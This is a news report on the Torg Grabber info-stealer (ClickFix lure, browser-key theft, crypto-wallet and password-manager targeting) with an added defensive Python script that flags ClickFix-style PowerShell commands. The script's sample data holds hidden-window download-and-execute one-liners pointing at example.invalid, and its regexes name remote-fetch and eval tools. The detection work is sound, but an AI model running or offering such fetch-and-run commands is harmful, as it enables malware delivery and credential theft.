
A new info-stealing malware called Torg Grabber is stealing sensitive data from 850 browser extensions, more than 700 of them for cryptocurrency wallets.
Initial access is obtained through the ClickFix technique: a lure hijacks the clipboard and tricks the user into pasting and executing a malicious PowerShell command.
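The ClickFix vector leaves a trail defenders can search, because the pasted one-liner shows up in process-creation logs and, when the lure asks the victim to paste into the Win+R Run dialog, in the Explorer RunMRU registry key. The block below is an added example, not code from Gen Digital or from the Torg Grabber operators: it scores command lines for the usual ClickFix traits, decodes an `-EncodedCommand` argument before scoring it, and normalizes a RunMRU snapshot. The indicator regexes, the verdict threshold, the `example.invalid` URLs and the registry snapshot are all constructed for the example.

```python
"""Triage helper for ClickFix-style PowerShell one-liners.

Added example, not Torg Grabber code or Gen Digital tooling. Works on
command lines from any source a defender already collects: process-creation
logs, or HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU,
which records what was typed or pasted into the Win+R Run dialog.
All sample data below is constructed.
"""
import base64
import re

# -EncodedCommand payloads are base64(UTF-16LE); PowerShell accepts -e/-ec/-enc.
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# Assumed heuristics for the pasted-command pattern; single hits are common in
# legitimate admin scripts, so the verdict below requires a combination.
INDICATORS = {
    "hidden_window":     re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile":        re.compile(r"-nop(?:rofile)?\b", re.I),
    "bypass_policy":     re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "encoded_command":   ENC_RE,
    "remote_fetch":      re.compile(
        r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString)\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
}


def decode_encoded_command(cmd):
    """Return the plaintext of an -EncodedCommand argument, or None."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(cmd):
    """Score one command line; indicators found inside a decoded payload count too."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(cmd)}
    inner = decode_encoded_command(cmd)
    if inner is not None:
        hits |= {name for name, rx in INDICATORS.items() if rx.search(inner)}
    # Verdict: download-and-eval is the ClickFix signature; otherwise demand 3 traits.
    flagged = ("remote_fetch" in hits and "invoke_expression" in hits) or len(hits) >= 3
    return {"command": cmd, "decoded": inner,
            "indicators": sorted(hits), "clickfix_like": flagged}


def parse_runmru(values):
    """RunMRU stores one value per slot letter, each ending in a literal '\\1',
    and an MRUList string giving slot order, most recent first."""
    ordered = []
    for slot in values.get("MRUList", ""):
        entry = values.get(slot)
        if entry is None:
            continue
        ordered.append(entry[:-2] if entry.endswith("\\1") else entry)
    return ordered


def _encode(ps):
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed RunMRU snapshot (not real registry data): two ClickFix-style
# entries and one ordinary scheduled-script invocation.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "c": 'powershell -w hidden -nop -c "iwr https://example.invalid/verify | iex"\\1',
    "b": "powershell -ep bypass -enc " + _encode("irm https://example.invalid/a | iex") + "\\1",
    "a": "powershell -NoProfile -File C:\\scripts\\backup.ps1\\1",
}


def triage_runmru(values=SAMPLE_RUNMRU):
    """Assess every entry of a RunMRU snapshot, most recent first."""
    return [assess(c) for c in parse_runmru(values)]


if __name__ == "__main__":
    for r in triage_runmru():
        print("FLAG" if r["clickfix_like"] else "ok  ", r["indicators"], r["command"][:60])
```

The same `assess` function can be fed `CommandLine` fields from Sysmon or EDR process-creation events; RunMRU is just the artifact that survives on a host where the paste happened and logging was absent.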
According to researchers at cybersecurity company Gen Digital, Torg Grabber is actively developed, with 334 unique samples compiled in three months (between December 2025 and February 2026) and new command-and-control (C2) servers registered every week.
Apart from cryptocurrency wallets, Torg Grabber steals data from 103 password managers and two-factor authentication tools, and 19 note-taking apps.
In a technical report this week, Gen Digital researchers say that Torg Grabber's initial builds used a Telegram-based and then a custom, encrypted TCP protocol for data exfiltration.
On December 18, 2025, the two mechanisms were abandoned in favor of an HTTPS connection routed through Cloudflare infrastructure. The method supports chunked data uploads and payload delivery.
The malware features several anti-analysis mechanisms, multi-layered obfuscation, and uses direct syscalls and reflective loading for evasion, running the final payload entirely in memory.
On December 22, 2025, Torg Grabber added App-Bound Encryption (ABE) bypass to beat Chrome’s (and Brave's, Edge's, Vivaldi's, and Opera's) cookie protection system, like many other information stealers.
The researchers also discovered a standalone browser-data extraction tool called Underground.
It injects a DLL reflectively into the browser to access Chrome’s COM Elevation Service and extract the master encryption key, a method also recently seen in VoidStealer.
Gen Digital found that Torg Grabber targets 25 Chromium-based browsers and 8 Firefox variants, trying to steal credentials, cookies, and autofill data.
Of the 850 browser extensions it targets, 728 are for cryptocurrency wallets, covering "essentially every crypto wallet ever conceived by human optimism."
"The marquee names are all there - MetaMask, Phantom, TrustWallet, Coinbase, Binance, Exodus, TronLink, Ronin, OKX, Keplr, Rabby, Sui, Solflare," the researchers say.
"But the list doesn’t stop at the big names. It keeps going, deep into the long tail, past projects with install counts you could fit in a phone booth."
Apart from wallets, the malware also targets a large list of 103 extensions for passwords, tokens, and authenticators: LastPass, 1Password, Bitwarden, KeePass, NordPass, Dashlane, ProtonPass, Enpass, Psono, Pleasant Password Server, heylogin, 2FAAuth, GAuth, TOTP Authenticator, and Akamai MFA.
Torg Grabber also targets information from Discord, Telegram, Steam, VPN apps, FTP apps, email clients, password managers, and desktop cryptocurrency wallet apps.
The malware can also profile the host, create a hardware fingerprint, document installed software (including 24 antivirus tools), take screenshots of the user’s desktop, and steal files from the Desktop/Documents folders.
Also notable is its capability to execute shellcode on the compromised device, delivered from the C2 in ChaCha-encrypted, zlib-compressed form.
Gen Digital cautions that Torg Grabber continues to develop rapidly, registering new C2 domains weekly, and that its operator base is expanding, with 40 tags documented by the time of analysis.